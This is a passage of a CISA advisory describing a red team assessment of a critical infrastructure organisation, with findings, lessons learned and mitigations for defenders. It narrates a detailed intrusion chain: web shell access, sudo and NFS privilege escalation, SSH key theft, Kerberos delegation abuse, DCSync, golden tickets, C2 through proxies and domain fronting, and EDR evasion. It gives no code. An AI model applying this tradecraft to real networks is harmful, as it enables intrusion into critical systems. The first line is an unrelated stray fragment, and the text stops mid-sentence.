/opt/landesk/broker/webroot/gsb/view.php Removes one of the original webshells.
Executive Summary The Cybersecurity and Infrastructure Security Agency (CISA) conducted a red team assessment (RTA) at the request of a critical infrastructure organization. During RTAs, CISA’s red team simulates real-world malicious cyber operations to assess an organization’s cybersecurity detection and response capabilities. In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory to detail the red team’s activity—including their tactics, techniques, and procedures (TTPs) and associated network defense activity. Additionally, the advisory contains lessons learned and key findings from the assessment to provide recommendations to network defenders and software manufacturers for improving their organizations’ and customers’ cybersecurity posture. Within this assessment, the red team (also referred to as ‘the team’) gained initial access through a web shell left from a third party’s previous security assessment. The red team proceeded to move through the demilitarized zone (DMZ) and into the network to fully compromise the organization’s domain and several sensitive business system (SBS) targets. The assessed organization discovered evidence of the red team’s initial activity but failed to act promptly regarding the malicious network traffic through its DMZ or challenge much of the red team’s presence in the organization’s Windows environment. The red team was able to compromise the domain and SBSs of the organization as it lacked sufficient controls to detect and respond to their activities. The red team’s findings illuminate lessons learned for network defenders and software manufacturers about how to respond to and reduce risk. Lesson Learned: The assessed organization had insufficient technical controls to prevent and detect malicious activity. The organization relied too heavily on host-based endpoint detection and response (EDR) solutions and did not implement sufficient network layer protections. Lesson Learned: The organization’s staff require continuous training, support, and resources to implement secure software configurations and detect malicious activity. Staff need to continuously enhance their technical competency, gain additional institutional knowledge of their systems, and ensure they are provided sufficient resources by management to have the conditions to succeed in protecting their networks. Lesson Learned: The organization’s leadership minimized the business risk of known attack vectors for the organization. Leadership deprioritized the treatment of a vulnerability their own cybersecurity team identified, and in their risk-based decision-making, miscalculated the potential impact and likelihood of its exploitation. To reduce risk of similar malicious cyber activity, CISA encourages critical infrastructure organizations to apply the recommendations in the Mitigations section of this advisory to ensure security processes and procedures are up to date, effective, and enable timely detection and mitigation of malicious activity. This document illustrates the outsized burden and costs of compensating for insecure software and hardware borne by critical infrastructure owners and operators. The expectation that owners and operators should maintain the requisite sophisticated cyber defense skills creates undue risk. Technology manufacturers must assume responsibility for product security. Recognizing that insecure software contributes to these identified issues, CISA urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this advisory, including those listed below: Embed security into product architecture throughout the entire software development lifecycle (SDLC). Eliminate default passwords. Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature. Download the PDF version of this report: AA24-326A Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a U.S. Critical Infrastructure Sector Organization (PDF, 823.56 KB ) INTRODUCTION CISA has authority to—upon request—provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to federal and non-federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. §§ 652[c][5], 659[c][6]). The target organization for this assessment was a critical infrastructure organization in the United States. After receiving a request for an RTA from the organization and coordinating the high-level details of the engagement, CISA conducted the RTA over approximately a three-month period. During RTAs, a CISA red team simulates real-world threat actors to assess an organization’s cybersecurity detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization’s enterprise network, avoid detection, evade defenses, and access SBSs. During Phase II, the red team attempts to trigger a security response from the organization’s people, processes, and/or technology. Drafted in coordination with the assessed organization, this advisory details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders with recommendations for improving an organization’s cybersecurity posture. The advisory also provides recommendations for software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise. TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See Appendix: MITRE ATT&CK Tactics and Techniques for a table of the red team’s activity mapped to MITRE ATT&CK tactics and techniques. Phase I: Red Team Cyber Threat Activity Overview The CISA red team operated without prior knowledge of the organization’s technology assets and began the assessment by conducting open source research on the target organization to gain information about its network [T1590], defensive tools [T1590.006], and employees [T1589.003]. The red team designed spearphishing campaigns [T1566] tailored to employees most likely to communicate with external parties. The phishing attempts were ultimately unsuccessful—targets ran the payloads [T1204], but their execution did not result in the red team gaining access into the network. After the failed spearphishing campaigns, the red team continued external reconnaissance of the network [T1595] and discovered a web shell [T1505.003] left from a previous Vulnerability Disclosure Program (VDP). The red team used this for initial access [TA0001] and immediately reported it to the organization’s trusted agents (TAs). The red team leveraged that access to escalate privileges [TA0004] on the host, discover credential material on a misconfigured Network File System (NFS) share [T1552.001], and move from a DMZ to the internal network [TA0008]. With access to the internal network, the red team gained further access to several SBSs. The red team leveraged a certificate for client authentication [T1649] they discovered on the NFS share to compromise a system configured for Unconstrained Delegation. This allowed the red team to acquire a ticket granting ticket (TGT) for a domain controller [T1558.001], used to further compromise the domain. The red team leveraged this level of access to exploit SBS targets provided by the organization’s TAs. The assessed organization detected much of the red team’s activity in their Linux infrastructure after CISA alerted them via other channels to the vulnerability the red team used for initial access. Once given an official notification of a vulnerability, the organization’s network defenders began mitigating the vulnerability. Network defenders removed the site hosting the web shell from the public internet but did not take the server itself offline. A week later, network defenders officially declared an incident once they determined the web shell was used to breach the internal network. For several weeks, network defenders terminated much of the red team’s access until the team maintained implants on only four hosts. Network defenders successfully delayed the red team from accessing many SBSs that required additional positioning, forcing the red team to spend time refortifying their access in the network. Despite these actions, the red team was still able to access a subset of SBSs. Eventually, the red team and TAs decided that the network defenders would stand down to allow the red team to continue its operations in a monitoring mode. In monitoring mode, network defenders would report what they observed of the red team’s access, but not continue to block and terminate it. See Figure 1 for a timeline of the red team’s activity with key points access. See the following sections for additional details, including the red team’s TTPs. Figure 1: Timeline of Red Team Cyber Threat Activity Initial Access Following an unsuccessful spearphishing campaign, the red team gained initial access to the target by exploiting an internet-facing Linux web server [T1190] discovered through reconnaissance [TA0043] of the organization’s external internet protocol (IP) space [T1590.005]. The red team first conducted open source research [T1593] to identify information about the organization’s network, including the tools used to protect the network and potential targets for spearphishing. The red team looked for email addresses [T1589.002] and names to infer email addresses from the organization’s email syntax (discovered during reconnaissance). Following this action, the red team sent tailored spearphishing emails to 13 targets [T1566.002]. Of these 13 targets, one user responded and executed two malicious payloads [T1204.002]. However, the payloads failed to bypass a previously undiscovered technical control employed by the victim organization, preventing the red team’s first attempt to gain initial access. To find an alternate pathway for initial access, the red team conducted reconnaissance with several publicly available tools, such as Shodan and Censys, to discover accessible devices and services on the internet [T1596.005]. The red team identified an old and unpatched service with a known XML External Entity (XXE) vulnerability and leveraged a public proof of concept to deploy a web shell. The associated product had an exposed endpoint—one that system administrators should typically block from the public internet—that allowed the red team to discover a preexisting web shell on the organization’s Linux web server. The preexisting web shell allowed the red team to run arbitrary commands on the server [T1059] as a user (WEBUSER1). Using the web shell, the red team identified an open internal proxy server [T1016] to send outbound communications to the internet via Hypertext Transfer Protocol Secure (HTTPS). The red team then downloaded [T1105] and executed a Sliver payload that utilized this proxy to establish command and control (C2) over this host, calling back to their infrastructure [TA0011]. Note: Because the web shell and unpatched vulnerability allowed actors to easily gain initial access to the organization, the CISA red team determined this was a critical vulnerability. CISA reported both the vulnerability and the web shell to the organization in an official vulnerability notification so the organization could remediate both issues. Following this notification, the victim organization initiated threat hunting activities, detecting some of the red team’s activity. The TAs determined that network defenders had previously identified and reported the vulnerability but did not remediate it. Further, the TAs found that network defenders were unaware of the web shell and believed it was likely leftover from prior VDP activity. See the Defense Evasion and Victim Network Defense Activities section for more information. Linux Infrastructure Compromise Local Privilege Escalation and Credential Access The red team then moved laterally from the web server to the organization’s internal network using valid accounts [T1078] as the DMZ was not properly segmented from the organization’s internal domain. The red team acquired credentials [TA0006] by first escalating privileges on the web server. The team discovered that WEBUSER1 had excessive sudo rights, allowing them to run some commands as root commands without a password. They used these elevated rights to deploy a new callback with root access [T1548.003]. With root access to the web server, the team had full access to the organization’s directories and files on a NFS share with no_root_squash enabled. If no_root_squash is used, remote root users can read and change any file on the shared file system and leave a trojan horse [T1080] for other users to inadvertently execute. On Linux operating systems this option is disabled by default, yet the organization enabled it to accommodate several legacy systems. The organization’s decision to enable the no_root_squash option allowed the red team to read all the files on the NFS share once it escalated its privileges on a single host with the NFS share mounted. This NFS share hosted the home directories of hundreds of Linux users—many of which had privileged access to one or more servers—and was auto-mounted when those users logged into Linux hosts in the environment. The red team used its escalated privileges to search for private certificate files, Secure Shell (SSH) private keys, passwords, bash command histories [T1552.003], and other sensitive data across all user files on the NFS share [T1039]. The team initially obtained 61 private SSH keys [T1552.004] and a file containing valid cleartext domain credentials (DOMAINUSER1) that the team used to authenticate to the organization’s domain [T1078.002]. Linux Command and Control In the organization’s Linux environment, the red team leveraged HTTPS connections for C2 [T1071.001]. Most of the Linux systems could not directly access the internet, but the red team circumvented this by leveraging an open internal HTTPS proxy [T1090.001] for their traffic. Lateral Movement and Persistence The red team’s acquisition of SSH private keys generated for user and service accounts facilitated unrestricted lateral movement to other Linux hosts [T1021.004]. This acquisition included two highly privileged accounts with root access to hundreds of servers. Within one week of initial access, the team moved to multiple Linux servers and established persistence [TA0003] on four. The team used a different persistence mechanism on each Linux host, so network defenders would be less likely to discover the red team’s presence on all four hosts. The team temporarily backdoored several scripts run at boot time to maintain persistence [T1037], ensuring the original versions of the scripts were re-enabled once the team successfully achieved persistence. Some of the team’s techniques included modifying preexisting scripts run by the cron utility [T1053.003] and ifup-post scripts [T1037.003]. Of note, the team gained root access to an SBS-adjacent infrastructure management server that ran Ansible Tower. Access to this Ansible Tower system [T1072] provided easy access to multiple SBSs. The team discovered a root SSH private key on the host, which allowed the team to move to six SBSs across six different sensitive IP ranges. A week after the team provided screenshots of root access to the SBSs to the TAs, the TAs deconflicted the red team’s access to the Ansible Tower system that network defenders discovered. The organization detected the compromise by observing abnormal usage of the root SSH private key. The root SSH private key was used to log into multiple hosts at times and for durations outside of preestablished baselines. In a real compromise, the organization would have had to shut down the server, significantly impacting business operations. Windows Domain Controller Compromise Approximately two weeks after gaining initial access, the red team compromised a Windows domain controller. This compromise allowed the team to move laterally to all domain-joined Windows hosts within the organization. To first gain situational awareness about the organization’s environment, the red team exfiltrated Active Directory (AD) information [TA0010] from a compromised Linux host that had network access to a Domain Controller (DC). The team queried Lightweight Directory Access Protocol (Over SSL)—(LDAPS)—to collect information about users [T1087.002], computers [T1018], groups [T1069.002], access control lists (ACL), organizational units (OU), and group policy objects (GPO) [T1615]. Unfortunately, the organization did not have detections to monitor for anomalous LDAP traffic. A non-privileged user querying LDAP from the organization’s Linux domain should have alerted network defenders. The red team observed a total of 42 hosts in AD that were not DCs, but had Unconstrained Delegation enabled. Hosts with Unconstrained Delegation enabled store the Kerberos TGTs of any user that authenticates to them. With sufficient privileges, an actor can obtain those tickets and impersonate associated users. A compromise of any of these hosts could lead to the escalation of privileges within the domain. Network defenders should work with system administrators to determine whether Unconstrained Delegation is necessary for their systems and limit the number of systems with Unconstrained Delegation unnecessarily enabled. The red team observed insufficient network segmentation between the organization’s Linux and Windows domains. This allowed for Server Message Block (SMB) and Kerberos traffic to a DC and a domain server with Unconstrained Delegation enabled (UDHOST). The team discovered an unprotected Personal Information Exchange (.pfx) file on the NFS home share that they believed was for UDHOST based on its naming convention. Equipped with the .pfx file, the red team used Rubeus—an open source toolset for Kerberos interaction and abuses—to acquire a TGT and New Technology Local Area Network Manager (NTLM) hash for UDHOST from the DC. The team then used the TGT to abuse the Server-for-User-to-Self (S4U2Self) Kerberos extension to gain administrative access to UDHOST. The red team leveraged this administrative access to upload a modified version of Rubeus in monitor mode to capture incoming tickets [T1040] on UDHOST with Rubeus’ /monitor command. Next, the team ran DFSCoerce.py to force the domain controller to authenticate to UDHOST [T1187]. The team then downloaded the captured tickets from UDHOST. With the DC’s TGT, the team used Domain Controller Sync (DCSync) through their Linux tunnels to acquire the hash of several privileged accounts—including domain, enterprise, and server administrators—and the critical krbtgt account [T1003.006]. Gaining access to AD is not unusual for most of CISA’s Red Team engagements, but it is rare to find network defenders who can secure and monitor it quickly and effectively. Once the team harvested the credentials needed, they moved laterally to nearly any system in the Windows domain (see Figure 2) through the following steps (hereafter, this combination of techniques is referred to as the “Preferred Lateral Movement Technique”): The team either forged a golden ticket using the krbtgt hash or requested a valid TGT using the hashes they exfiltrated for a specific account before loading the ticket into their session for additional authentication. The team dropped an inflated Dynamic Link Library (DLL) file associated with legitimate scheduled tasks on the organization’s domain. When the scheduled task executed on its own or through the red team’s prompting, the DLL hijack launched a C2 implant. Figure 2: Movement to Domain Controller Windows Command and Control The red team initially established C2 on a workstation over HTTPS before connecting to servers over SMB [T1071.002] in the organization’s Windows environment. To connect to certain SBSs later in its activity, the team again relied on HTTPS for C2. Post-Exploitation Activity: Gaining Access to SBSs After the red team gained persistent access to Linux and Windows systems across the organization’s networks, the team began post-exploitation activities and attempted to access SBSs. The TAs provided a scope of the organization’s Classless Inter-Domain Routing (CIDR) ranges that contained SBSs. The team gained root access to multiple Linux servers in these ranges. The TAs then instructed the red team to exploit its list of primary targets: admin workstations and network ranges that included OT networks. The team only achieved access to the first two targets and did not find a path to the OT networks. While the team was able to affect the integrity of data derived from OT devices and applications, it was unable to find and access the organization’s internal network where the OT devices resided. To gain access to the SBSs, the team first gained access to Microsoft System Center Configuration Manager (SCCM) servers, which managed most of the domain’s Windows systems. To access the SCCM servers, the team leveraged their AD data to identify administrators [T1087] of these targets. One of the users they previously acquired credentials for via DCSync was an administrator on the SCCM servers. The red team then used the Preferred Lateral Movement Technique to eventually authenticate to the SCCM servers. See Figure 3. Figure 3: Attack Path to SCCM Server Admin Workstations The first specific set of SBS targets provided by the TAs were admin workstations. These systems are used across various sensitive networks external to, or inaccessible from, the internal network where the team already had access. Normally, authorized personnel leverage these administrator workstations to perform administrator functions. CISA’s red team targeted these systems in the hopes that an authorized—but unwitting—user would move the tainted system to another network, resulting in a callback from the sensitive target network. The red team reviewed AD data to identify these administrator systems. Through their review, the team discovered a subset of Windows workstations that could be identified with a prefix and determined a group likely to have administrative rights to the workstations. With access to the SCCM server, the red team utilized their Preferred Lateral Movement Technique to gain access to each admin workstation target (see Figure 4). Figure 4: Attack Path from SCCM Server to Admin Workstations The red team maintained access to these systems for several weeks, periodically checking where they were communicating from to determine if they had moved to another network. Eventually, the team lost access to these systems without a deconfliction. To the best of the red team’s knowledge, these systems either did not move to new networks or, if they did, those systems no longer had the ability to communicate with red team’s C2 infrastructure. Additional Host and Other Subnets Figure 5: Attack Path from SCCM Server to Host and Other Subnets After compromising admin workstations, the red team requested that the TAs prioritize additional systems or IP ranges. The TAs provided four CIDR ranges to target: A corporate DMZ that contained a mixture of systems and other subnets. A second subnet. A third subnet. An internal network that contained OT devices. Access to the corporate DMZ was necessary to reach the second and third ranges, and the red team hoped that gaining access to these would facilitate access to the fourth range. The red team followed a familiar playbook to gain access to these SBSs from another SCCM server. First, the team performed reverse DNS lookups [T1596.001] on IP addresses within the ranges the TAs provided. They then scanned SMB port 445/TCP [T1046] from a previously compromised SCCM server to discover Windows hosts it could access on the corporate DMZ. The team discovered the server could connect to a host within the target IP range and that the system was running an outdated version of Windows Server 2012 R2. The default configuration of Windows Server 2012 R2 allows unprivileged users to query the group membership of local administrator groups. The red team discovered a user account [T1069] by querying the Windows Server 2012 R2 target that was in a database administrator group. The team leveraged its Preferred Lateral Movement Technique to authenticate to the target as that user, then repeated that technique to access a database. This database receives information from OT devices used to feed monitoring dashboards, information which factors into the organization’s decision-making process [T1213]. The new host had several active connections to systems in the internal ranges of the second and third subnets. Reverse domain name system (DNS) lookup requests for these hosts failed to return any results. However, the systems were also running Windows Server 2012 R2. The red team used Windows API calls to NetLocalGroupEnum and NetLocalGroupGetMembers to query local groups [T1069.001], revealing the system names for these targets as a result. The red team performed their Preferred Lateral Movement Technique to gain access to these hosts in the second and third provided network ranges. With access to these subnets, the red team began exploring a path to systems on a private subnet where OT devices resided but failed to locate a path to that fourth subnet. Corporate Workstations of Critical Infrastructure Administrators and Operators Next, the red team targeted the corporate workstations of the administrators and operators of the organization’s critical infrastructure. Because the team lacked knowledge of the organization’s OT devices and failed to discover a path to the private subnet where they resided, they instead tried to locate users that interacted with human machine interfaces (HMI). Access to such users could enable the team to access the HMI, which serves as a dashboard for OT. The red team leveraged its AD data once again, combining this data with user information from SCCM to identify targets by job role and their primary workstation. Then the team targeted the desktop of a critical infrastructure administrator, the workstation of another critical infrastructure administrator, and the workstations of three critical infrastructure operators spread across two geographically disparate sites. The AD data revealed users in a group that were administrators of all the targets. The red team then repeated their Preferred Lateral Movement Technique and identified a logged-in user connected to a “System Status and Alarm Monitoring” interface. The team discovered credentials to the interface in the user’s home directory, proxied through the system, and accessed the HMI interface over HTTP. The team did not pursue further activity involving the interface because their remaining assessment time was limited. Additionally, they did not discover a way to compromise the underlying OT devices. Command and Control The team used third-party owned and operated infrastructure and services [T1583] throughout its assessment, including in certain cases for command and control (C2). The tools that the red team obtained included [T1588.002]: Sliver, Mythic, Cobalt Strike, and other commercial C2 frameworks. The team maintained multiple command and control servers hosted by several cloud vendors. They configured each server with a different domain and used the servers for communication with compromised hosts. These servers retained all assessment data. Two commercially available cloud-computing platforms. The team used these platforms to create flexible and dynamic redirect servers to send traffic to the team’s servers [T1090.002]. Redirecting servers make it difficult for defenders to attribute assessment activities to the backend team servers. The redirectors use HTTPS reverse proxies to redirect C2 traffic between the target organization’s network and the team servers. The team encrypted all data in transit [T1573] and secured all data at rest through a VPN with multifactor authentication. Content delivery network (CDN) services. This technique leverages CDNs associated with high-reputation domains, causing malicious traffic to appear directed towards a reputational domain. However, it is redirected to red team-controlled servers. This allows the team to obfuscate some of their C2 traffic. The team used domain fronting [T1090.004] to disguise outbound traffic, diversifying communications between the domains and the persistent beacons. This technique (which also leverages CDNs) allows the beacon to appear to connect to third-party domains but instead connects to the team’s redirect server. Defense Evasion and Victim Network Defense Activities Most of the encounters between the red team and network defenders occurred in the organization’s Linux environment. The red team leveraged Linux tradecraft in an attempt to evade network defenses. In response, network defenders’ threat hunting activities identified some of the team’s presence in their Linux environment. To evade defenses, the red team reordered the process identifier (PID) of its executable processes to appear closer to the kernel and minimize the team’s likelihood of detection. The team also modified its processes [T1055] by changing their names in memory and at execution. In addition, they used Python scripts [T1059.006] run in memory [T1620] to avoid on-disk detection. Some of the red team’s Linux persistence techniques included modifying preexisting scripts run by the cron utility and creating backdoors through ifup-post scripts and .bashrc. Network defenders ultimately identified the team’s backdoor in .bashrc [T1546.004]. Defenders also successfully detected anomalous activity on their Ansible Tower host and other systems in their Linux environment. The defenders actively analyzed NetFlow data, which helped them identify the red team’s persistence and lateral movement. To mitigate the impact of the red team’s tactics, network defenders would have needed to shut down a critical server as part of their incident response activities. A shut down would have resulted in downtime for hundreds of systems, including SBSs. The organization’s EDR solutions largely failed to protect the organization. EDR detected only a few of the red team’s payloads in the organization’s Windows and Linux environments. In the instance the EDR protected the organization from the initial phishing payload, it generated an alert that network defenders neither read nor responded to. The red team excelled in bypassing EDR solutions by avoiding the use of basic “known-bad” detections the tools would capture. The team also inflated its file sizes above the upload threshold of the organization’s EDR [T1027.001]. In addition, the organization completely lacked any EDR solution in a legacy environment. As such, the red team’s persistence there went undetected throughout the assessment. Network defenders failed to detect red team activity in the organization’s Windows environment due to a lack of proper identity management. Specifically, network defenders failed to detect and respond to the red team’s S4U2Self, asktgs, dcsync, and golden ticket activity. Had the organization monitored for unusual activity involving AD and Kerberos, they would have detected more red team activity. Lastly, there were significant deficiencies in the organization’s DMZ that should have detected traffic into the organization’s internal network over the ports used by SMB and LDAPS. Network defenders never properly implemented an intrusion detection system (IDS) or intrusion prevention system (IPS) to monitor the DMZ at the network level. This lack of implementation resulted in a failure to detect malicious network traffic through their DMZ. Further, the red team was able to move laterally through the DMZ because there was an open internal proxy with internet access that enabled the team’s C2. Phase II: Red Team Measurable Events Activity The red team executed 13 measurable events designed to provoke a response from the people, processes, and technology defending the organization’s network. The red team did not have full visibility into the organization’s responses to these events and lacked the support of a white team to help assess the organization’s responses. See Table 1 for a description of the events, the organization’s actual response, and key takeaways. Table 1: Measurable events Measurable Event Description MITRE ATT&CK Technique(s) Organization’s Reported Reactions Key Takeaways Internal Port Scan Launches a scan from inside the network from a previously gained workstation to enumerate ports on target workstation, server, and domain controller system(s). Network Service Discovery [T1046] Identified an AD enumeration tool and temporarily blocked access to one C2 domain, which resulted in the red team temporarily losing access to six SCCM servers. The organization did not report identifying the port scan. In addition, with proper network segmentation, the scan’s target hosts should not have been able to communicate. Comprehensive Active Directory and Host Enumeration Performs AD enumeration by querying all domain objects from the DC and enumerates trust relationships within the AD Forest, user accounts, and current session information from every domain computer (workstation and server). Domain Trust Discovery [T1482] Account Discovery: Domain Account [T1087.002] System Owner/User Discovery [T1033] Remote System Discovery [T1018] Identified an AD enumeration tool and temporarily blocked access to one C2 domain, which resulted in the red team temporarily losing access to six SCCM servers. The organization did not report identifying the port scan. In addition, with proper network segmentation, the scan’s target hosts should not have been able to communicate. Data Exfiltration – 1 GB of Data Sends a large amount (1GB) of mock sensitive information to an external host. Exfiltration Over Alternative Protocol [T1048] A proxy likely blocked 1GB of data exfiltration during the red team’s first attempt. However, the team’s second attempt was successful when they exfiltrated the data in 100MB blocks. Hours after the data exfiltration, the organization blocked the domain used for C2 and removed access to the compromised host. Organizations should implement web proxies that contain data threshold restrictions. Furthermore, network defenders need to manually analyze proxy data to determine whether there is legitimate outbound traffic or potentially malicious data exfiltration. Malicious Traffic Generation- Workstation to External Host Establishes a session that originates from a target workstation system directly to an external host over a clear text protocol, such as HTTP. Application Layer Protocol [T1071] The organization blocked access to the host and the C2 domains the red team used. The organization blocked the malicious traffic at the network level but did not appear to identify the source workstation. Active Directory Account Lockout Locks out several administrative AD accounts in rapid succession. Account Access Removal [T1531] The organization’s password policy locked out the AD accounts. However, within minutes the accounts reopened, likely due to a group policy and/or an automated response. There was no identified active response from the organization. Organizations should monitor AD account activity in Windows event logs against baselines to detect anomalous and potentially malicious activity. Local Admin User Account Creation (workstation) Creates a local administrator account on a target workstation system. Create Account: Local Account [T1136.001] Account Manipulation [T1098] An automated response removed the account from local administrator’s group but did not delete it. Despite group policy objects removing the account, there were no detections for the activity. Local Admin User Account Creation (server) Creates a local administrator account on a target server system. Create Account: Local Account [T1136.001] Account Manipulation [T1098] An automated response removed the account from local Administrator’s group but did not delete it. Despite group policy objects removing the account, there were no detections for the activity. Active Directory Account Creation Creates AD accounts and add them to domain admins group Create Account: Domain Account [T1136.002] Account Manipulation [T1098] An alert existed for this action but was disabled at the time the original event was triggered, thus it was undetected. After coordination between the TAs and red team revealed this lapse, the alert was enabled, the red team performed the action once again, and this time, TAs provided a screenshot of the alert from their monitoring dashboards. Detection tools are only useful when network defenders tune them appropriately and effectively monitor alerts. At first, the organization missed an opportunity to respond to a tool that should have produced a true positive alert because it was misconfigured. Domain Admin Lateral Movement—Workstation to Domain Controller and Workstation to Workstation Compromises a Domain Admin account and uses it to run PSExec on multiple workstations and domain controllers. System Services: Service Execution [T1569.002] Remote Services: SMB/Windows Admin Shares [T1021.002] None identified. Detect malicious use of standard tools like PSExec that malicious cyber actors may use for lateral movement by monitoring Windows logs for anomalous activity. In addition, organizations should look for abnormal communications between workstations. Malicious Traffic Generation- Domain Controller to External Host Establishes a session that originates from a target domain controller system directly to an external host over a clear text protocol, such as HTTP. Application Layer Protocol [T1071] None identified. DCs should never connect directly to an external host over HTTP. The organization failed to detect and respond to this. Trigger Host-Based Protection- Domain Controller Uploads and executes a well-known (e.g., with a signature) malicious file to a target DC system to generate host-based alerts. Ingress Tool Transfer [T1105] Malicious file was removed by host-based endpoint protection system. Host based detection tools can be helpful in detecting known IOCs. However, organizations should focus on detecting anomalous behavior by monitoring their networks and hosts against good baselines. The blocking of this well-known tool on a DC should trigger an urgent investigation. Ransomware Simulation Executes simulated ransomware on multiple workstation systems to simulate a ransomware attack. Note: This technique does not encrypt files on the target system. N/A Two out of nine users reported the event to defensive staff who identified all hosts that executed the ransomware. Five users likely rebooted their systems when observing the ransomware, one logged off and on, one closed the ransomware application repeatedly and continued working, one locked their screen, and another user exited the ransomware process after two hours. Security awareness training should provide employees effective tools on how to respond to ransomware activity. LESSONS LEARNED AND KEY FINDINGS The red team noted the following lessons learned relevant to all organizations generated from the security assessment of the organization’s network. These findings contributed to the team’s ability to gain persistent access across the organization’s network. See the Mitigations section for recommendations on how to mitigate these findings. Lesson Learned: Insufficient Technical Controls The assessed organization had insufficient technical controls to prevent and detect malicious activity. The organization relied too heavily on host-based EDR solutions and did not implement sufficient network layer protections. Finding #1: The organization’s perimeter network was not adequately firewalled from its internal network, which allowed the red team a path through the DMZ to internal networks. A properly configured network should block access to a path from the DMZ to other internal networks. Finding #2: The organization was too reliant on its host-based tools and lacked network layer protections, such as well-configured web proxies or intrusion prevention systems (IPS). The organization’s EDR solutions also failed to catch all the red team’s payloads. Below is a list of some of the higher risk activities conducted by the team that were opportunities for detection: Phishing; Kerberoasting; Generation and use of golden tickets; S4U2self abuse; Anomalous LDAP traffic; Anomalous NFS enumeration; Unconstrained Delegation server compromise; DCSync; Anomalous account usage during lateral movement; Anomalous outbound network traffic; Anomalous outbound SSH connections to the team’s cloud servers from workstations; and Use of proxy servers from hosts intended to be restricted from internet access. Finding #3: The organization had insufficient host monitoring in a legacy environment. The organization had hosts with a legacy operating system without a local EDR solution, which allowed the red team to persist for several months on the hosts undetected. Lesson Learned: Continuous Training, Support, and Resources The organization’s staff requires continuous training, support, and resources to implement secure software configurations and detect malicious activity. Staff need to continuously enhance their technical competency, gain additional institutional knowledge of their systems, and ensure are provided sufficient resources by management to adequately protect their networks. Finding #4: The organization had multiple systems configured insecurely. This allowed the red team to compromise, maintain persistence, and further exploit those systems (i.e., access credentials, elevate privileges, and move laterally). Insecure system configurations included: Default server configurations. The organization used default configurations for hosts with Windows Server 2012 R2, which allows unprivileged users to query membership of local administrator groups. This enabled the red team to identify several standard user accounts with administrative access. Note: By default, NFS shares change the root user to the nfsnobody user, an unprivileged user account. In this way, users with local root access are prevented from gaining root level access over the mounted NFS share. Here, the organization deviated from the secure by default configuration and implemented the no_root_squash option to support a few legacy systems instead. This deviation from the default allowed the red team to escalate their privileges over the domain. Hosts with Unconstrained Delegation enabled unnecessarily. Hosts with Unconstrained Delegation enabled will store the Kerberos TGTs of all users that authenticate to that host. This affords threat actors the opportunity to steal TGTs, including the TGT for a domain controller, and use them to escalate their privileges over the domain. Insecure Account Configuration. The organization had an account running a Linux webserver with excessive privileges. The entry for that user in the sudoers file—which controls user rights—contained paths with wildcards where that user had write access, allowing the team to escalate privileges. Note: This file should only contain specific paths to executable files that a user needs to run as another user or root, and not a wildcard. Users should not have write access over any file in the sudoers entry. Finding #5: The red team’s activities generated security alerts that network defenders did not review. In many instances, the organization relied too heavily on known IOCs and their EDR solutions instead of conducting independent analysis of their network activity compared against baselines. Finding #6: The organization lacked proper identity management. Because network defenders did not implement a centralized identity management system in their Linux network, they had to manually query every Linux host for artifacts related to the red team’s lateral movement through SSH. Defenders also failed to detect anomalous activity in their organization’s Windows environment because of poor identity management. Lesson Learned: Business Risk The organization’s leadership minimized the business risk of known attack vectors for their organization. Leadership deprioritized the treatment of a vulnerability their own cybersecurity team identified, and in their risk-based decision-making, miscalculated the potential impact and likelihood of its exploitation. Finding #7: The organization used known insecure and outdated software. The red team discovered software on one of the organization’s web servers that was outdated. After their operations, the red team learned the insecure and outdated software was a known security concern. The organization’s security team alerted management to the risks associated this software, but management accepted the risk. Next, the security team implemented a VDP program, which resulted in a participant exploiting the vulnerability for initial access. The VDP program helped the security team gain management support, and they implemented a web application firewall (WAF) as a compensating control. However, they did not adequately mitigate the vulnerability as they configured the WAF to be only in monitoring mode. The security team either did not have processes (or implement them properly) to scan, assess, and test whether they treated the vulnerability effectively. Additional Findings The red team noted the following additional issues relevant to the security of the organization’s network that contributed to their activity. Unsecured Keys and Credentials. The organization stored many private keys that lacked password protection, allowing the red team to steal the keys and use them for authentication purposes. The private key of a PFX file was not password protected, allowing the red team to use that certificate to authenticate to active directory, access UDHOST, and eventually compromise the DC. In addition, the organization did not require password protection of SSH private keys. Note: Without a password protected key, an actor can more easily steal the private key and use it to authenticate to a system through SSH. The organization had files in a home share that contained cleartext passwords. The accounts included, among other accounts, a system administrator. Note: The organization appeared to store cleartext passwords in the description and user password sections of Active Directory accounts. These passwords were accessible to all domain users. Email Address Verification. The active Microsoft Office 365 configuration allows an unauthenticated external user to validate email addresses through observing error messages in the form of HTTP 302 versus HTTP 200 responses. This misconfiguration helps threat actors verify email addresses before sending phishing emails. Noted Strengths The red team noted the following technical controls or defensive measures that prevented or hampered offensive actions: Network defenders detected the initial compromise and some red team movement. After being alerted of the web shell, the organization initiated hunt activities, detected initial access, and tracked some of the red team’s Phase I movements. The organization terminated much of the red team’s access to the organization’s internal network. Of note, once the organization’s defenders discovered the red team’s access, the red team spent significant time and resources continuously refortifying their access to the network. Host-based EDR solutions prevented initial access by phishing. The EDR stopped the execution of multiple payloads the red team sent to a user of the organization over a week long period. The organization leveraged two products on workstations, one that was publicly discoverable and another the red team did not learn about until gaining initial access. The product the red team was unaware of, and did not test their payload against, was responsible for stopping the execution of their payloads. Strong domain password policy. The organization’s domain password policy neutralized the red team’s attempts to crack hashes and spray passwords. The team was unable to crack any hashes of all 115 service accounts it targeted. Effective separation of privileges. The organization’s administrative users had separate accounts for performing privileged actions versus routine activities. This makes privilege escalation more difficult for threat actors. MITIGATIONS Network Defenders CISA recommends organizations implement the recommendations in Table 2 to mitigate the findings listed in the Lessons Learned and Key Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the 